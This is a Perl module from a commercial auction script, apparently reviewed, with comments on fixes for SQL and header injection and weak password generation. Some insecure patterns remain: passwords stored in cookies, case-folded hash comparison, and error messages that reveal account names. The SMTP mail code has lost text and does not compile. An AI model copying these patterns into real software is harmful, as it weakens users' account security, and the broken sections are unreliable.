#!/usr/bin/perl ############################################################################## # Ultimate Auction - Deutsche Ausgabe - Version 3.0 # ############################################################################## # Copyright 2001 thinkfactory - Alle Rechte vorbehalten. # # Copyright 2001 Ultimate Auction Inc. - All rights reserved. # ############################################################################## # Ultimate Auction ist ein käuflich zu erwerbendes Lizenzprodukt. # ############################################################################## # # # Lizenzbedingungen: # # # # - Durch den Kauf und Einsatz der Software erklären Sie sich mit diesen # # Lizenzabkommen einverstanden. # # # # - Diese Lizenz erlaubt es Ihnen, Ultimate Auction auf einem Server und # # einer Website zu benutzen. Für jede installierte Instanz dieses # # Programms benötigen Sie jeweils eine erworbene Lizenz. # # # # - Als legitimierter Benutzer von Ultimate Auction können Sie auf eigenes # # Risiko die Software verändern und/oder auf Ihre Bedürfnisse anpassen. # # Sie können Dritte mit der Anpassung/Veränderung beauftragen. # # # # - Die Original-Software oder die angepasste/veränderte Software und # # Teile derer dürfen nicht weitergegeben oder verkauft oder # # wiederverkauft werden. # # # # - Alle Copyright- und Versions-Hinweise, die in Ultimate Auction oder # # deren HTML-Seiten verwendet, erstellt und/oder gezeigt werden, # # dürfen nicht entfernt werden. Die Copyright- und Versions-Hinweise # # sowie je nach Version der Zusatz "powered by Ultimate Auction" müssen # # für Benutzer sichtbar und in ungeänderter Form dargestellt werden. # # # # - Dieses Lizenzabkommen beruht auf der aktuellen internationalen # # Gesetzeslage. # # # # - Bei einem Verstoß gegen diesen Lizenzvertrag kann durch die Firma # # Ultimate Auction, Inc. 
oder deren Beauftragten die erworbene Lizenz # # jederzeit zurückgezogen und für nichtig erklärt werden, es werden # # keinerlei geleisteten Zahlungen für erworbene Lizenzen erstattet. # # # # - Ultimate Auction und die dazugehörenden Dateien werden ohne # # Funktionsgarantie für die im Umfeld verwendete Hardware oder # # Software verkauft. # # # # - Ultimate Auction Inc. oder deren Beauftragten sind in keiner Form # # für Inhalte oder Verfasser verantwortlich, die durch diese # # Software erstellt wurden. # # # # - Das Risiko der Benutzung von Ultimate Auction obliegt dem # # Lizenznehmer, jegliche Erstattungen im Rechtsfall erstrecken sich # # maximal auf den Kaufpreis der Lizenz. # # # # Weitere Informationen finden Sie unter http://www.ultimate-auction.de # # # ############################################################################## # # # Wir wünschen viel Spaß mit Ultimate Auction! # # # ############################################################################## package UltimateAuction; # Package the Perl Module ####################################################################### # Export the variables from the module # ####################################################################### require Exporter; @ISA = qw (Exporter); @EXPORT = qw(@EXPORT_OK); @EXPORT_OK = qw(%form $couser $copass $db $dbh %config @auction_types); ####################################################################### ###################################################################### # Initiate Our Modules # ###################################################################### use DBI; use IO::Socket; use vars qw(%form $couser $copass $db $dbh %config @auction_types); use strict; ###################################################################### require "variables/variables.cgi"; require "variables/mainvariables.cgi"; my $statusConnectionError; ################################################# # Parse Form Data # 
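#################################################

# _read_request_body()
# Reads the POST body from STDIN using CONTENT_LENGTH and returns it as a
# string ('' when there is no body).
# NOTE(review): STDIN can only be consumed once per request; a second call in
# the same request returns an empty body. No upper bound is applied to
# CONTENT_LENGTH here; rely on the web server's request-size limit or add one.
sub _read_request_body {
    my $length = $ENV{'CONTENT_LENGTH'};
    my $buffer = '';
    # Only read when the length is a plain positive integer; the value comes
    # from the client.
    if (defined $length && $length =~ /\A\d+\z/ && $length > 0) {
        read(STDIN, $buffer, $length);
    }
    return defined $buffer ? $buffer : '';
}

# _decode_form_pairs($raw, $newline_as)
# Turns a raw urlencoded string into a flat (name, value, name, value, ...)
# list. Each CR or LF in a decoded field is replaced by $newline_as.
# The string is split on '&' first and then on the FIRST '=' of each pair, so
# a field with an empty value, no '=' at all, or a literal '=' in its value
# still yields exactly one name and one value. The previous split on /&|=/
# dropped trailing empty values and shifted every later name/value by one,
# which let a request make one parameter's name become another one's value.
sub _decode_form_pairs {
    my ($raw, $newline_as) = @_;
    my @data;
    return @data unless defined $raw && length $raw;

    foreach my $pair (split(/&/, $raw)) {
        next unless length $pair;
        my ($name, $value) = split(/=/, $pair, 2);
        $value = '' unless defined $value;
        foreach my $field ($name, $value) {
            $field =~ tr/+/ /;
            # "C" (unsigned) instead of "c": bytes above 0x7F no longer wrap.
            $field =~ s/%([0-9a-fA-F]{2})/pack("C",hex($1))/ge;
            $field =~ s/[\r\n]/$newline_as/g;
            push @data, $field;
        }
    }
    return @data;
}

# fetch_form()
# Returns the request parameters (POST body first, then QUERY_STRING) as a
# flat name/value list suitable for assignment to a hash. CR and LF inside
# names and values are replaced by a space. Values are otherwise raw,
# client-controlled data: escape them for HTML, SQL or mail headers at the
# point of use.
sub fetch_form {
    my $body = _read_request_body();
    return (
        _decode_form_pairs($body, ' '),
        _decode_form_pairs($ENV{'QUERY_STRING'}, ' '),
    );
}

#################################################
# Parse Form Data for mailinglist               #
#################################################
# fetch_form2()
# Same as fetch_form, except that CR and LF in the POST body are each turned
# into "\n" instead of a space (query-string fields still get a space).
# NOTE(review): body values returned here can contain line breaks; a caller
# that places them in mail headers must strip CR/LF itself.
sub fetch_form2 {
    my $body = _read_request_body();
    return (
        _decode_form_pairs($body, "\n"),
        _decode_form_pairs($ENV{'QUERY_STRING'}, ' '),
    );
}

#################################################
# Database Functions                            #
#################################################
# sql_encode($text)
# Backslash-escapes backslash, single quote and double quote for use inside a
# quoted SQL string literal and returns the escaped copy.
# The double-quote rule used to be s/"/\"/g, which replaces '"' with '"'
# (a no-op); it now really emits \".
# NOTE(review): hand-rolled escaping depends on the server's quoting mode and
# connection character set. Prefer DBI placeholders ("?" with bind values) or
# $db->quote() for any value that originates from a request.
sub sql_encode {
    my $toencode = $_[0];
    $toencode =~ s/\\/\\\\/g;
    $toencode =~ s/\'/\\\'/g;
    $toencode =~ s/"/\\"/g;
    return $toencode;
}

# url_encode($text)
# Percent-encodes every character outside [a-zA-Z0-9_.-] using upper-case hex.
sub url_encode {
    my $input = shift;
    $input =~ s/([^a-zA-Z0-9_.-])/sprintf("%%%02X",ord($1))/eg;
    return $input;
}

# dollar_encode($amount)
# Normalises an amount to "<integer>.<two digits>": thousands commas are
# removed, the fraction is truncated (not rounded) to two digits and padded
# with zeros.
sub dollar_encode {
    my $toencode = shift;
    $toencode =~ s/\,//g;
    my @dolamt = split(/\./, $toencode);

    $dolamt[0] = "0" if (!($dolamt[0]));
    $dolamt[0] = int($dolamt[0]);

    # Guard the substr so an amount without a fraction does not warn.
    $dolamt[1] = defined $dolamt[1] ? substr($dolamt[1], 0, 2) : '';
    $dolamt[1] = "00"            if (length($dolamt[1]) == 0);
    $dolamt[1] = "$dolamt[1]0"   if (length($dolamt[1]) == 1);

    return "$dolamt[0].$dolamt[1]";
}

# format_price($amount, $htmlon)
# Returns "<currency> <whole>.<two digits>" using $config{'currency'}.
# Side effect kept from the original: commas are stripped from the CALLER's
# variable because the substitution runs on $_[0]; passing a literal dies
# with "Modification of a read-only value".
# NOTE(review): all three branches return the same string in this listing;
# the sign/$htmlon tests presumably selected different markup in the original
# file - confirm before simplifying.
sub format_price {
    $_[0] =~ s/\,//g;
    my $htmlon = $_[1];
    my @amt = split(/\./, $_[0]);

    $amt[0] = "0" if (!($amt[0]));
    $amt[1] = defined $amt[1] ? substr($amt[1], 0, 2) : '';
    $amt[1] = "00"         if (length($amt[1]) == 0);
    $amt[1] = "$amt[1]0"   if (length($amt[1]) == 1);

    if (($_[0] < 0) && ($htmlon)) {
        return "$config{'currency'} $amt[0].$amt[1]";
    }
    elsif (($_[0] > 0) && ($htmlon)) {
        return "$config{'currency'} $amt[0].$amt[1]";
    }
    else {
        return "$config{'currency'} $amt[0].$amt[1]";
    }
}

# format_price_clean($amount, $htmlon)
# Identical to format_price in this listing, including the in-place comma
# stripping of the caller's variable ($_[0] is passed through as an alias).
sub format_price_clean {
    return format_price($_[0], $_[1]);
}

#################################################
# Connect to the database                       #
#################################################
# mysql_connect()
# Opens the MySQL connection described by %config and returns the handle.
# On failure the administrator is mailed the DBI error text and the visitor
# gets a generic message via UltimateAuction::error (which ends the request);
# the driver's error string is deliberately not shown to the visitor.
sub mysql_connect {
    # A failed connect() calls statusConnectionError(), which sets the flag
    # and leaves the true value 1 in $db - hence the double test below.
    my $db = DBI->connect(
        "DBI:mysql:$config{'connectstring'}:$config{'dbserver'}",
        "$config{'dbusername'}",
        "$config{'dbpassword'}"
    ) || statusConnectionError();

    if ($db && $statusConnectionError != 1) {
        return $db;
    }

    my $current_time = time + ($config{'timediff'} * 3600);
    my $alarm_time   = UltimateAuction::display_time1($current_time);
    my $alarmmailto  = "Hallo Administrator,\n\ndie MySQL-Datenbank war am $alarm_time nicht verfügbar.\n\nGrund: $DBI::errstr\n\n";
    UltimateAuction::sendemail($config{'admin_address'},$config{'admin_address'},"ACHTUNG: Datenbank nicht verfügbar",$alarmmailto);
    UltimateAuction::error("Zur Zeit ist keine Verbindung zur MySQL-Datenbank möglich - bitte versuchen Sie es später nocheinmal");
}

# statusConnectionError()
# Records that the last connect attempt failed. The flag is never reset, so
# it stays set for the rest of the process.
sub statusConnectionError {
    $statusConnectionError = 1;
}

#################################################
# Disconnect from the database                  #
#################################################
# mysql_disconnect($db)
# Finishes the shared statement handle $dbh (if any) and disconnects $db.
# Dies with the DBI error text when the disconnect fails. Returns the result
# of disconnect, or '' when no handle was passed.
# NOTE(review): the original chained "and undef $_[0]" after die, so the
# caller's handle was never cleared; that behaviour is kept.
sub mysql_disconnect {
    if ($dbh) {
        $dbh->finish;
    }
    return '' unless defined $_[0];

    my $ok = $_[0]->disconnect
        or die "Keine Verbindung zur MySQL-Datenbank möglich - Grund: $DBI::errstr";
    return $ok;
}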
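#################################################
# Displays Time Remaining for Auctions          #
#################################################
# time_remain($end_epoch)
# Returns a German "time left" label for an auction that closes at
# $end_epoch, or "Auktion beendet" once that moment has passed.
# The original had separate "> 12 hours" and "> 0 hours" branches that return
# the same text in this listing; they are merged here.
sub time_remain($) {
    my $diff = $_[0] - time;
    return "Auktion beendet" if $diff < 0;

    my $days  = int($diff / 86400);
    my $hours = int(($diff - $days * 86400) / 3600);
    my $mins  = int(($diff - $days * 86400 - $hours * 3600) / 60);

    if ($days > 1) {
        return "$days Tage $hours Std.+";
    }
    elsif ($days == 1) {
        return "1 Tag $hours Std.+";
    }
    elsif ($hours > 0) {
        return "$hours Std. $mins Min+";
    }
    else {
        my $secs = int($diff - ($days * 86400) - ($hours * 3600) - ($mins * 60));
        return "$mins Min $secs Sek+";
    }
}

#################################################
# Get Cookie From Computer                      #
#################################################
# get_cookie()
# Parses HTTP_COOKIE into a name => value hash, undoing the escaping that
# set_cookie applies. Everything returned is client-controlled.
# Each pair is now split on the first '=' only, so a value that contains a
# raw '=' is no longer cut short.
sub get_cookie {
    my %cookie;
    # Decode order matters: it mirrors the encode order used by set_cookie.
    my @Cdec = ('\+', '\%3A\%3A', '\%3D', '\%2C', '\%25', '\%2B', '\%26','\%3B');
    my %Cdec = ('\+',' ','\%3A\%3A','::','\%3D','=','\%2C',',','\%25','%','\%2B','+','\%26','&','\%3B',';');

    return %cookie unless $ENV{'HTTP_COOKIE'};

    foreach my $pair (split(/; /, $ENV{'HTTP_COOKIE'})) {
        my ($cookie, $value) = split(/=/, $pair, 2);
        next unless defined $cookie && length $cookie;
        $value = '' unless defined $value;
        foreach my $char (@Cdec) {
            $cookie =~ s/$char/$Cdec{$char}/g;
            $value  =~ s/$char/$Cdec{$char}/g;
        }
        $cookie{$cookie} = $value;
    }
    return %cookie;
}

#################################################
# Send A Cookie to a Computer                   #
#################################################
# set_cookie($name, $value, $type, ...)
# Prints one Set-Cookie header per (name, value, type) triple. A type of 1
# adds "expires=$config{'cexp'}". Whitespace (including CR/LF) in name and
# value is encoded as '+', so the header line cannot be split.
# NOTE(review): no Path, Secure or HttpOnly attribute is emitted; with the
# password kept in a cookie (see authenticate) that leaves it readable by
# page scripts and sent over plain HTTP.
sub set_cookie {
    my @cookie = @_;
    my @Cenc = ('\;','\&','\+','\%','\,','\=','\:\:','\s');
    my %Cenc = ('\;','%3B','\&','%26','\+','%2B','\%','%25','\,','%2C','\=','%3D','\:\:','%3A%3A','\s','+');

    for (my $i = 0; $i <= $#cookie; $i = $i + 3) {
        my ($cookie, $value, $type) = @cookie[$i .. $i+2];
        foreach my $char (@Cenc) {
            $cookie =~ s/$char/$Cenc{$char}/g;
            $value  =~ s/$char/$Cenc{$char}/g;
        }
        my $header = 'Set-Cookie: ' . $cookie . '=' . $value . ';';
        if ($type == 1) {
            $header .= ' expires=' . $config{'cexp'} . ';'
        }
        print "$header\n";
    }
}

#################################################
# Breaks the listings up into multiple pages    #
#################################################
# pagebreak($pcount, $pagebreak)
# Builds the pager text for a listing with $pcount pages, based on the
# request's "page" parameter.
# NOTE(review): the markup inside these strings did not survive in this
# listing, so $urlfragment is built but never used here. It copies parameter
# NAMES unencoded (only values are escaped) - presumably into link targets;
# encode the names as well when the links are restored.
sub pagebreak{
    local %form = &UltimateAuction::fetch_form;
    my $content;
    my $begin = "\nBlättern:";
    my $next = "weiter";
    my $nonext = "Ende";
    my $previous = " zurück";
    my $noprevious = " Anfang";
    my $end = "\n";
    my $urlfragment;
    foreach(keys %form){
        next if($_ eq 'pb' || $_ eq 'page');
        my $f = $form{$_};
        $f=~s/(\W)/'%'.unpack("H2", $1)/eg;
        $urlfragment.='&' if $urlfragment;
        $urlfragment.="$_=$f";
    }
    my($pcount, $pagebreak) = @_;
    $content = $begin;
    if($form{page} > 0){
        $content .= " [$noprevious] ";
        $content .= " [$previous] ";
    }
    #$content .= "|";
    #for(0..$form{page}-1) {
    #  $content .= " @{[$_+1]} "
    #}
    #$content .= " ", int($form{page})+1, " ";
    #for($form{page}+1..$pcount) {
    #  $content .=" @{[$_+1]} "
    #}
    #if($pcount>0) {
    #  $content .= " Alle "
    #}
    if($form{page} < $pcount) {
        $content .= " [$next] "
    }
    $content .= $end;
    return $content;
}

#################################################
# Send out system emails                        #
#################################################
# sendemail($to, $from, $subject, $message)
# Sends a plain-text mail through the configured mail program
# ($config{'mailmethod'} eq 0) or by speaking SMTP to $config{'smtp'}
# ($config{'mailmethod'} eq 1).
# CR and LF are now removed from $to, $from and $subject before use: those
# values end up in header lines and SMTP commands, where an embedded line
# break would let a request add headers or recipients.
# NOTE(review): the SMTP branch below is reproduced exactly as it appears in
# this listing, where text between angle brackets was lost (the reads after
# "$l =", the pattern in "s///d", and the "if" that opens the block closed
# before "else"). It does not compile as shown; restore it from the original
# file. When doing so, also dot-stuff $message lines that start with "."
# and use the list form of open for the mail program if its arguments allow.
sub sendemail {
    my ($to,$from,$subject,$message) = @_;
    foreach my $field ($to, $from, $subject) {
        $field =~ s/[\r\n]+/ /g if defined $field;
    }
    if ($config{'mailmethod'} eq 0) {
        # Skip the write when the mail program cannot be started.
        if (open MAIL, "|$config{'mailprog'}") {
            print MAIL "To: $to\nFrom: $from\nSubject: $subject\n\n$message\n\n";
            close MAIL;
        }
    }
    if ($config{'mailmethod'} eq 1) {
        my $remotehost;
        my $port;
        my $proto;
        my $port;
        my $error_title = "Fehler: ";
        my $FromName;
        my $mailserver = $config{'smtp'};
        my $test;
        my @fm;
        my $fm;
        my @f;
        my $l;
        $remotehost = $config{'smtp'};
        $proto = getprotobyname('tcp');
        $port=25;
        $test = $from;
        $test =~ s///d;
        $FromName = $f[0];
        $from = $f[1];
        } else {
            $FromName = '';
        }
        socket(S, AF_INET, SOCK_STREAM, $proto) || Error($error_title,"error 1\n");
        my $sin = sockaddr_in( $port, inet_aton( $remotehost ));
        connect(S, $sin) || Error($error_title,"error 3\n");
        select(S);
        $| = 1;
        select(STDOUT);
        $l = ;
        if (substr($l,0,3) ne "220") {Error($error_title,"Connect: $l");}
        print S "helo $mailserver\r\n";
        $l = ;
        if (substr($l,0,3) ne "250") {Error($error_title,"helo: $l");}
        print S "mail from: $from\r\n";
        $l = ;
        if (substr($l,0,3) ne "250") {Error($error_title,"mail: $l");}
        print S "rcpt to: $to\r\n";
        $l = ;
        if (substr($l,0,3) ne "250") {Error($error_title,"rcpt: $l");}
        print S "data\r\n";
        $l = ;
        if (substr($l,0,3) ne "354") {Error($error_title,"data begin: $l");}
        print S "Subject: $subject\r\n";
        print S "From: $FromName <$from>\r\n";
        print S "To: $to\r\n";
        print S "Content-type: text\/plain\r\n";
        print S "\r\n";
        print S "$message\r\n";
        print S "\r\n.\r\n";
        $l = ;
        if (substr($l,0,3) ne "250") {Error($error_title,"data end: $l");}
        print S "quit\r\n";
        $l = ;
        if (substr($l,0,3) ne "221") {Error($error_title,"quit: $l");}
        close(S);
    }
}

#################################################
# Display Error Message and Stop the Process    #
#################################################
# error($message)
# Prints header, the error.txt template with $message inserted, and footer,
# disconnects the database if $db is set, then exits.
# NOTE(review): $message is substituted into an HTML page as-is. Callers must
# HTML-escape any request data they put into it. The placeholder pattern of
# the substitution was lost in this listing (it shows as an empty pattern).
sub error {
    my $header = &UltimateAuction::header;      # Fetch the header
    &UltimateAuction::Display($header);         # Display the Header
    my $error = shift;
    my $content=UltimateAuction::Open_Template("error.txt");
    $content=~ s//$error/g;
    &UltimateAuction::Display($content);        # Display the Page Contents
    my $footer = &UltimateAuction::footer;      # Fetch the footer
    &UltimateAuction::Display($footer);         # Display the Footer
    #print STDERR "$error\n";
    if ($db) {                                  # disconnect from our database
        &UltimateAuction::mysql_disconnect($db);
    }
    exit(0);
}

#################################################
# Display maintenance page and stop             #
#################################################
# service()
# When $config{'service'} eq 1, prints header, service.txt and footer,
# disconnects the database if $db is set, and exits. Otherwise does nothing.
sub service {
    if ($config{'service'} eq 1) {
        my $header = &UltimateAuction::header;  # Fetch the header
        &UltimateAuction::Display($header);     # Display the Header
        my $content=UltimateAuction::Open_Template("service.txt");
        &UltimateAuction::Display($content);    # Display the Page Contents
        my $footer = &UltimateAuction::footer;  # Fetch the footer
        &UltimateAuction::Display($footer);     # Display the Footer
        if ($db) {
            &UltimateAuction::mysql_disconnect($db);
        }
        exit(0);
    }
}

#################################################
# Convert the time to a readable format         #
#################################################
# _short_time_parts($epoch)
# Splits scalar localtime($epoch) ("Thu Sep  9 12:03:04 2004") into
# (zero-padded day, zero-padded month number, four-digit year, hour, minute).
# The year is taken whole from localtime; the original glued a literal "20"
# onto the last two digits, which is wrong outside 2000-2099.
sub _short_time_parts {
    my ($epoch) = @_;
    my @tarray = split(/ +/, scalar localtime($epoch));
    my %months = (
        "Jan" => 1, "Feb" => 2,  "Mar" => 3,  "Apr" => 4,
        "May" => 5, "Jun" => 6,  "Jul" => 7,  "Aug" => 8,
        "Sep" => 9, "Oct" => 10, "Nov" => 11, "Dec" => 12
    );
    my ($hour, $min) = split(/:/, $tarray[3]);
    my $day   = $tarray[2];
    my $month = $months{$tarray[1]};
    $day   = "0" . $day   if $day < 10;
    $month = "0" . $month if $month < 10;
    return ($day, $month, $tarray[4], $hour, $min);
}

# display_time1($epoch)
# "DD.MM.YYYY um HH:MM Uhr" when $config{'timeformat'} is "short", otherwise
# the plain localtime string.
sub display_time1 {
    my $time = shift;
    return scalar localtime($time) unless $config{'timeformat'} eq "short";
    my ($day, $month, $year, $hour, $min) = _short_time_parts($time);
    return "$day.$month.$year um $hour:$min Uhr";
}

# display_time2($epoch)
# "DD. <German month name> YYYY um HH:MM Uhr (<timezone>)"; does not depend
# on $config{'timeformat'}.
sub display_time2 {
    my $time = shift;
    my @tarray = split(/ +/, scalar localtime($time));
    my %months = (
        "Jan" => "Januar",    "Feb" => "Februar", "Mar" => "März",
        "Apr" => "April",     "May" => "Mai",     "Jun" => "Juni",
        "Jul" => "Juli",      "Aug" => "August",  "Sep" => "September",
        "Oct" => "Oktober",   "Nov" => "November", "Dec" => "Dezember"
    );
    my ($hour, $min) = split(/:/, $tarray[3]);
    my $day = $tarray[2];
    $day = "0" . $day if $day < 10;
    return "$day. $months{$tarray[1]} $tarray[4] um $hour:$min Uhr ($config{'timezone'})";
}

#################################################
# Short-Date                                    #
#################################################
# display_time3($epoch)
# "DD.MM.YYYY" in short mode, otherwise the plain localtime string.
sub display_time3 {
    my $time = shift;
    return scalar localtime($time) unless $config{'timeformat'} eq "short";
    my ($day, $month, $year) = _short_time_parts($time);
    return "$day.$month.$year";
}

# display_time4($epoch)
# "DD.MM.YYYY - HH:MM h" in short mode, otherwise the plain localtime string.
sub display_time4 {
    my $time = shift;
    return scalar localtime($time) unless $config{'timeformat'} eq "short";
    my ($day, $month, $year, $hour, $min) = _short_time_parts($time);
    return "$day.$month.$year - $hour:$min h";
}

# display_time5($epoch)
# "YYYYMMDD" in short mode, otherwise the plain localtime string.
sub display_time5 {
    my $time = shift;
    return scalar localtime($time) unless $config{'timeformat'} eq "short";
    my ($day, $month, $year) = _short_time_parts($time);
    return "$year$month$day";
}

#################################################
# Authentication System                         #
#################################################
# _html_escape($text)
# Returns $text with & < > " ' replaced by HTML entities ('' for undef).
sub _html_escape {
    my ($text) = @_;
    return '' unless defined $text;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
}

# authenticate($waistuser, $waistpass, $require, $nocrypt, $db)
# Checks a login against the Members table and returns
# (usernum, username, stored password) on success, or (0,0,0) when neither a
# user name nor a password is available. Credentials come from the
# Username/Password cookies when both are present (with $require set, the
# password must still be supplied in $waistpass), otherwise from the
# arguments. With $nocrypt the supplied password is compared to the stored
# value directly instead of through crypt(). Any failure ends the request
# through error().
#
# Changes in this version:
#  - the user name is bound as a placeholder instead of being concatenated
#    into the SQL text;
#  - a row whose stored password is empty, or a crypt() call that returns
#    nothing, can no longer compare equal and pass the check;
#  - the user name is HTML-escaped before it is echoed in the error page.
#
# NOTE(review), not changed here because other code may depend on it:
#  - the password itself is written to a cookie on success and read back from
#    it on later requests; a server-side session token would avoid storing a
#    reusable secret in the browser;
#  - the comparison lower-cases both sides, which makes distinct crypt()
#    results match; confirm nothing stores hashes case-folded, then compare
#    exactly;
#  - crypt() with the stored value as salt uses whatever scheme that salt
#    selects, which for legacy data is likely weak;
#  - separate "unknown user" / "wrong password" messages reveal which account
#    names exist.
sub authenticate {
    my ($waistuser,$waistpass,$require,$nocrypt,$db) = @_;
    my $username;
    my $password;
    my $usedcookie;
    my $bad;
    my %cookie = get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};
    my ($usernum, $dbuser, $dbpass, $status, $suspend);

    if ($couser && $copass) {
        $nocrypt    = 0;
        $password   = $require ? $waistpass : $copass;
        $username   = $couser;
        $usedcookie = 1;
    }
    else {
        $username   = $waistuser;
        $password   = $waistpass;
        $usedcookie = 0;
    }

    if (!$username && !$password) {
        return (0, 0, 0);
    }

    # $dbh is the module-wide statement handle that mysql_disconnect finishes.
    $dbh = $db->prepare("SELECT usernum,username,password,status,status2 FROM Members WHERE LOWER(username) = LOWER(?)");
    $dbh->execute($username);

    if (($usernum,$dbuser,$dbpass,$status,$suspend) = $dbh->fetchrow_array()) {
        my $ifpass = $nocrypt ? $password : crypt($password, $dbpass);
        if (   !defined $ifpass
            || !defined $dbpass
            || !length $dbpass
            || lc($ifpass) ne lc($dbpass))
        {
            $bad = "password";
        }
    }
    else {
        $bad = "username";
    }
    if (!$status)  { $bad = "status"  unless $bad; }
    if (!$suspend) { $bad = "suspend" unless $bad; }

    if ($bad) {
        if ($usedcookie) {
            # Drop the stale login cookies before reporting the failure.
            UltimateAuction::set_cookie("Username","",0,"Password","",0);
        }
        if ($bad eq 'username') {
            my $shown = _html_escape($username);
            error("Der Benutzername \"$shown\" existiert nicht.");
        }
        elsif ($bad eq 'password') {
            error("Das Kennwort ist ungültig.");
        }
        elsif ($bad eq 'status') {
            error("Ihr Konto wurde noch nicht aktiviert. Wenn Sie sich bereits registriert haben, dann sollten Sie eine Bestätigungsmail mit einem Aktivierungslink erhalten haben. Die geschieht zur Überprüfung der korrekten E-Mail-Adresse.");
        }
        elsif ($bad eq 'suspend') {
            error("Ihr Konto ist gesperrt worden. Bei Fragen wenden Sie sich bitte an die Administration.");
        }
    }

    if (!$usedcookie) {
        UltimateAuction::set_cookie('Username',"$username",1,'Password',"$password",1);
    }
    return ("$usernum","$dbuser","$dbpass");
}

#################################################
# Find a user's rating                          #
#################################################
# addup_rating($usernum, $db)
# Returns the text shown next to a member: the feedback total, the rating
# symbol for that total, the "ID member" symbol and the new-member symbol
# (joined less than 30 days ago).
# $usernum is reduced to an integer once, so the same value is used in the
# queries and in the returned text.
# NOTE(review): the link markup in these strings was lost in this listing.
# $username comes from the database and is placed in the output unescaped;
# URL-encode / HTML-escape it when the links are restored.
sub addup_rating {
    my $usernum = int(shift);
    my $db = shift;
    my ($rating)   = $db->selectrow_array("SELECT SUM(rating) from Feedback WHERE ratee=" . $usernum);
    my ($username) = $db->selectrow_array("SELECT username from Members WHERE usernum=" . $usernum);
    my ($userjoin) = $db->selectrow_array("SELECT joindate from Members WHERE usernum=" . $usernum);
    my ($idmember) = $db->selectrow_array("SELECT idmember from Members WHERE usernum=" . $usernum);
    my $rsymbol;
    my $joinsymbol;
    my $idsymbol;
    my $current_time = time + ($config{'timediff'} * 3600);

    if ($current_time < (30 * 86400 + $userjoin)) {
        $joinsymbol=" /help.pl?template=newmember target='_blank'>";
        $joinsymbol.="$config{'joinsymbol'}";
        $joinsymbol.=" ";
    }
    if ($idmember eq '1') {
        $idsymbol = $config{'idmember'};
    }
    else {
        $idsymbol = "";
    }

    if ($rating) {
        $rsymbol = " /help.pl?template=stars target='_blank'>";
        # Bands 1..9 are half-open [rsymbolN, rsymbolN+1); band 10 is open-ended.
        foreach my $band (1 .. 9) {
            my $upper = $band + 1;
            if ($rating >= $config{"rsymbol$band"} and $rating < $config{"rsymbol$upper"}) {
                $rsymbol .= $config{"rsymbolimg$band"};
            }
        }
        if ($rating >= $config{'rsymbol10'}) {
            $rsymbol .= "$config{'rsymbolimg10'}";
        }
        $rsymbol .=" ";
        $rating="(/feedback.pl?usernum=$usernum&username=$username>$rating) $rsymbol $idsymbol $joinsymbol";
        return $rating;
    }
    else {
        return "(0) $idsymbol $joinsymbol";
    }
}

#################################################
# Charge/Credit User's Accounts                 #
#################################################
# modify_balance_general($user, $amount, $reason, $method, $db)
# Books $amount against $user's balance: $method 'Gebühr' subtracts it,
# 'Gutschrift' adds it. Writes one row to accounting and updates
# Members.balance.
#
# Changes in this version:
#  - every value is bound through a placeholder. Before, $user went into the
#    SELECT and UPDATE unescaped and $amount went into the INSERT unquoted,
#    so either could alter the statement;
#  - an unknown $method now returns without touching the database. Before,
#    it left the new balance undefined and the UPDATE stored an empty value.
#
# NOTE(review): the balance is read, changed in Perl and written back, so two
# concurrent bookings for the same user can overwrite each other; a single
# "SET balance = balance + ?" statement or a transaction would close that.
sub modify_balance_general {
    my ($user,$amount,$reason,$method,$db) = @_;
    my $current_time = time + ($config{'timediff'} * 3600);

    my $sign;
    if (defined $method && $method eq 'Gebühr') {
        $sign = -1;
    }
    elsif (defined $method && $method eq 'Gutschrift') {
        $sign = 1;
    }
    else {
        return;
    }

    # $dbh is the module-wide statement handle that mysql_disconnect finishes.
    $dbh = $db->prepare("SELECT balance FROM Members WHERE username=?");
    $dbh->execute($user);
    my ($balance) = $dbh->fetchrow_array();
    my $newam = $balance + $sign * $amount;

    $db->do(
        "INSERT INTO accounting (acUser,acDate,acCharge,acReason,acType) VALUES (?,?,?,?,?)",
        undef, $user, $current_time, $amount, $reason, $method
    );
    $db->do("UPDATE Members SET balance=? WHERE username=?", undef, $newam, $user);
}

#################################################
# Authentication Form                           #
#################################################
# auth_form($couser, $feature)
# Prints header, the authform.txt template with its placeholders filled, and
# footer.
# NOTE(review): the hidden-field markup and the placeholder patterns were
# lost in this listing (the substitutions show empty patterns). The loop
# suggests every request parameter except username/password is echoed back
# into the form - presumably as hidden inputs; names and values must be
# HTML-escaped there, as must $feature and $couser.
sub auth_form {
    local %form = &UltimateAuction::fetch_form;
    my ($couser,$feature) = @_;
    my $key;
    my $header = &UltimateAuction::header;      # Fetch the header
    &UltimateAuction::Display($header);         # Display the Header
    my $hidden;
    foreach $key(keys %form) {
        $hidden .= "\n" if ($key ne 'username' and $key ne 'password');
    }
    $hidden .= "";
    my $content=UltimateAuction::Open_Template("authform.txt");
    $content=~ s//$hidden/g;
    $content=~ s//$feature/g;
    $content=~ s//$couser/g;
    $content=~ s//$ENV{'SCRIPT_NAME'}/g;
    &UltimateAuction::Display($content);        # Display the Page Contents
    my $footer = &UltimateAuction::footer;      # Fetch the Footer
    &UltimateAuction::Display($footer);         # Display the Footer
}

#################################################
# Random password generator                     #
#################################################
# generate_pass()
# Returns an 8-character password from a 32-symbol alphabet (a-z without l
# and o, digits 2-9).
# The original called srand(time ^ $$) on every call, so the password was a
# function of the clock and the process id, both of which can be guessed.
# Random bytes are now read from /dev/urandom; 256 is a multiple of the
# alphabet size, so taking a byte modulo 32 is unbiased. When the device
# cannot be read, Perl's rand() is used without reseeding it.
# NOTE(review): the rand() fallback is not suitable for secrets; on a host
# without /dev/urandom, supply another system randomness source.
sub generate_pass {
    my @passset = ('a'..'k', 'm'..'n', 'p'..'z', '2'..'9');
    my $length = 8;

    my $random_bytes = '';
    if (open(my $urandom, '<', '/dev/urandom')) {
        binmode($urandom);
        my $got = read($urandom, $random_bytes, $length);
        close($urandom);
        $random_bytes = '' unless defined $got && $got == $length;
    }

    my $randpass = "";
    for (my $i = 0; $i < $length; $i++) {
        my $index;
        if (length $random_bytes) {
            $index = ord(substr($random_bytes, $i, 1)) % scalar(@passset);
        }
        else {
            $index = int(rand(scalar(@passset)));
        }
        $randpass .= $passset[$index];
    }
    return $randpass;
}

#################################################
# Find the lowest winning bid                   #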
#################################################
# get_high_bid($itemnum, $sellingqty, $db)
